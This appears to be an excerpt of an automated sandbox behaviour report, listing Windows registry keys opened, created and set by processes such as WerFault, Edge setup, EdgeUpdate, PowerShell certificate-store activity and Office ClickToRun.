| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\werfault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\ = "ProcMon Log File" | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294935296" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME\Database\Content Type\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell\runas\command | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ = "ie_to_edge_bho.IEToEdgeBHO.1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\ = "IEToEdgeBHO Class" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
